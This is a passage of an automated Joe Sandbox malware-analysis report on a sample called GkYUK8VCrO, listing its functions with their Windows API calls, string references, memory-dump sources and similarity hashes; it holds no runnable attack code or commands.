Function 00AC429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AC41B8), ref: 00AC42B8
GetProcAddress.KERNEL32(00000000), ref: 00AC42BF
EncodePointer.KERNEL32(00000000), ref: 00AC42CA
DecodePointer.KERNEL32(00AC41B8), ref: 00AC42E5

Strings

combase.dll, xrefs: 00AC42B3
RoUninitialize, xrefs: 00AC42A7

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 0ba654f2cb4a5b4ed854ce47cc54c87fbcc44de82a7bab437683640228efe499
Instruction ID: 61705a2dcc536e04ec91f0df576a5e153a19d4768467d036f319cd123132f08e
Opcode Fuzzy Hash: 0ba654f2cb4a5b4ed854ce47cc54c87fbcc44de82a7bab437683640228efe499
Instruction Fuzzy Hash: BAE09278581702ABEA209B60EE09B543EB4BB2AB42F204038F011E70E0CFB84591CA18

Function 00B0675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B068AD
_memmove.LIBCMT ref: 00B067E8

Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C

_memmove.LIBCMT ref: 00B0685B
_memmove.LIBCMT ref: 00B06942
_memmove.LIBCMT ref: 00B0695B
_memmove.LIBCMT ref: 00B06977

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: fe2f17f79ebd84cb438237771d0d4cdbd62087dd95f3309a9b711921911bb9bb
Instruction ID: 95c1139dcf5fba01f551c8a803d1eb4ef9d9c7fecb8dfd9312b508439fc645ff
Opcode Fuzzy Hash: fe2f17f79ebd84cb438237771d0d4cdbd62087dd95f3309a9b711921911bb9bb
Instruction Fuzzy Hash: 5B619E3060065AABDF11EF60CD81EFF3BA4AF4A308F054599F8555B1E2DB359D51CB60

Function 00B2046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00B210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B20588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B205AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B205D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B20617
RegCloseKey.ADVAPI32(00000000), ref: 00B20624

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 83827adb0d6fd0e179e754d72b20fc0b06243a807f5e42f9d7686b87601eb9e4
Instruction ID: 46876f4573890caf348eb966e040ade5c667c796ac37ef7b197c1f3d1e761259
Opcode Fuzzy Hash: 83827adb0d6fd0e179e754d72b20fc0b06243a807f5e42f9d7686b87601eb9e4
Instruction Fuzzy Hash: 13514431218200AFCB15EF24D985E6FBBE8FF89314F04496DF589872A2DB31E905CB52

Function 00B25A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B25A82
GetMenuItemCount.USER32(00000000), ref: 00B25AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B25AE1
GetMenuItemID.USER32(?,?), ref: 00B25B50
GetSubMenu.USER32(?,?), ref: 00B25B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B25BAF

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 18d331f521a78a96f9eaf965462c37426782d8c4319f9059e2fc2e4a8dc48beb
Instruction ID: 23ec722fe4ac74cb49a6714a1648bb9ec3b3cf5bf121777a0103b6631c814482
Opcode Fuzzy Hash: 18d331f521a78a96f9eaf965462c37426782d8c4319f9059e2fc2e4a8dc48beb
Instruction Fuzzy Hash: 32517F35A00625EFCF21EF64D985AAEB7F4EF49320F1044A9E815B7391CB70AE41CB90

Function 00AFF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AFF3F7
VariantClear.OLEAUT32(00000013), ref: 00AFF469
VariantClear.OLEAUT32(00000000), ref: 00AFF4C4
_memmove.LIBCMT ref: 00AFF4EE
VariantClear.OLEAUT32(?), ref: 00AFF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AFF569

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: a2b9fa915b1702cc26b83af6c6250004d87dd1a1172d83b8f227f5a0fa6f04f6
Instruction ID: e76f874c09c733b21080f344265405d3a7210ff73e06a7e93001910787f18380
Opcode Fuzzy Hash: a2b9fa915b1702cc26b83af6c6250004d87dd1a1172d83b8f227f5a0fa6f04f6
Instruction Fuzzy Hash: 0B516BB5A00209EFCB10DF58D880AAAB7B9FF4C354B158169FE59DB300D730E912CBA0

Function 00B026F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02792
IsMenu.USER32(00000000), ref: 00B027B2
CreatePopupMenu.USER32 ref: 00B027E6
GetMenuItemCount.USER32(000000FF), ref: 00B02844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B02875

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
Instruction ID: 374245df933350164f923ae34e2422a3b2a54720502fe7609c79800fd9aa0fd7
Opcode Fuzzy Hash: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
Instruction Fuzzy Hash: 92517774A0030AAFDB25CF68C98CAAEBFF4EF44314F1482A9E8119B2D1D7708908CB51

Function 00AA1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00AA179A
GetWindowRect.USER32(?,?), ref: 00AA17FE
ScreenToClient.USER32(?,?), ref: 00AA181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AA182C
EndPaint.USER32(?,?), ref: 00AA1876

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: c6f48755da99eb3e779f6ef62e38fa7f0cd1decb2c765d35961acdcc72f05125
Instruction ID: c327595c16ad4ccf8244f9ff95e77047db85c41f4617e62d7b6f8672dd87400a
Opcode Fuzzy Hash: c6f48755da99eb3e779f6ef62e38fa7f0cd1decb2c765d35961acdcc72f05125
Instruction Fuzzy Hash: 8941AC70504301AFD721DF24CC84BBA7BF8EB4A724F140669F9A58B2E1CB759845DB62

Function 00B2B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00B667B0,00000000,01125920,?,?,00B667B0,?,00B2B862,?,?), ref: 00B2B9CC
EnableWindow.USER32(00000000,00000000), ref: 00B2B9F0
ShowWindow.USER32(00B667B0,00000000,01125920,?,?,00B667B0,?,00B2B862,?,?), ref: 00B2BA50
ShowWindow.USER32(00000000,00000004,?,00B2B862,?,?), ref: 00B2BA62
EnableWindow.USER32(00000000,00000001), ref: 00B2BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B2BAA9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
Instruction ID: d3cf59dc263409950078b5c708787e62509ca8df15bdb98318a5e48af563c9f3
Opcode Fuzzy Hash: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
Instruction Fuzzy Hash: D9415030601251AFDB22CF54E489FA57BE0FB06310F1842F9EA4C9F6A2CF31A846CB51

Function 00B173B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B15134,?,?,00000000,00000001), ref: 00B173BF

Part of subcall function 00B13C94: GetWindowRect.USER32(?,?), ref: 00B13CA7

GetDesktopWindow.USER32 ref: 00B173E9
GetWindowRect.USER32(00000000), ref: 00B173F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B17422

Part of subcall function 00B054E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B0555E

GetCursorPos.USER32(?), ref: 00B1744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B174AC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 8d7eaf172b895a44aa3b028c4ff6e1fb65b7ecc6aa64937cf5f0f53c1eca3557
Instruction ID: 00c90a3fb0fe27f3fb46c66441054c960a82e9bfb3221564efddacb812ede122
Opcode Fuzzy Hash: 8d7eaf172b895a44aa3b028c4ff6e1fb65b7ecc6aa64937cf5f0f53c1eca3557
Instruction Fuzzy Hash: 0731E672508316ABD730DF14D849F9BBBE9FF98314F400929F58997291CB30EA49CB92

Function 00AF8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF8608
Part of subcall function 00AF85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF8612
Part of subcall function 00AF85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF8621
Part of subcall function 00AF85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF8628
Part of subcall function 00AF85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF863E

GetLengthSid.ADVAPI32(?,00000000,00AF8977), ref: 00AF8DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AF8DB8
HeapAlloc.KERNEL32(00000000), ref: 00AF8DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AF8DD8
GetProcessHeap.KERNEL32(00000000,00000000,00AF8977), ref: 00AF8DEC
HeapFree.KERNEL32(00000000), ref: 00AF8DF3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b249cec397ff3122ff2ddb8807686e1e5a6c31b9b41400c6a7234513267715f4
Instruction ID: 263afbea143320c9171202693ea5330ee543132ee640d6d52b4a7c80a1e2dbb9
Opcode Fuzzy Hash: b249cec397ff3122ff2ddb8807686e1e5a6c31b9b41400c6a7234513267715f4
Instruction Fuzzy Hash: 5711AF3190160AFFDB209FA4CC09BBEB779EF55316F104029FA45A7250DB399901CB60

Function 00AF8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AF8B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00AF8B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AF8B40
CloseHandle.KERNEL32(00000004), ref: 00AF8B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF8B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00AF8B8E

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
Instruction ID: 7fc9faf49b8ae49dcc80703115619c987e2d6e570ad2cabe8e0b0a74f8c4f307
Opcode Fuzzy Hash: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
Instruction Fuzzy Hash: 901117B250124EABDB118FA4ED49FEE7BB9EF08704F044065FE04A6160CB769D61AB61

Function 00B2C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00AA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA135C
Part of subcall function 00AA12F3: BeginPath.GDI32(?), ref: 00AA1373
Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B2C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00B2C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00B2C1F6
EndPath.GDI32(00000000), ref: 00B2C206
StrokePath.GDI32(00000000), ref: 00B2C216

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a6d1f014125379dcfc6acc86b14ea5388167068ddc509c5145ecfaac81cedd19
Instruction ID: 0455d06bebdc19f33a2006e1556cf4d58a8d534ccc3a32c236c69354519d8ff1
Opcode Fuzzy Hash: a6d1f014125379dcfc6acc86b14ea5388167068ddc509c5145ecfaac81cedd19
Instruction Fuzzy Hash: E311097640010DBFDF119F90DC88EAA7FADEB08354F048076FA189A1A2CB719D55DBA0

Function 00AC03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC0401

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
Instruction ID: 21afb50e52fba53bee43e2a9cefefd3fb430543e312957eb481af45e2e82bf75
Opcode Fuzzy Hash: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
Instruction Fuzzy Hash: 7D016CB090275A7DE3008F5A8C85B52FFB8FF19354F00411BA15C47941C7F5A868CBE5

Function 00B0568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B0569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B056B1
GetWindowThreadProcessId.USER32(?,?), ref: 00B056C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B056CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B056D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B056E0

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
Instruction ID: 06f2473d73d27eacf2c26faa708940982258f2b12118c00287dd6834f70862cd
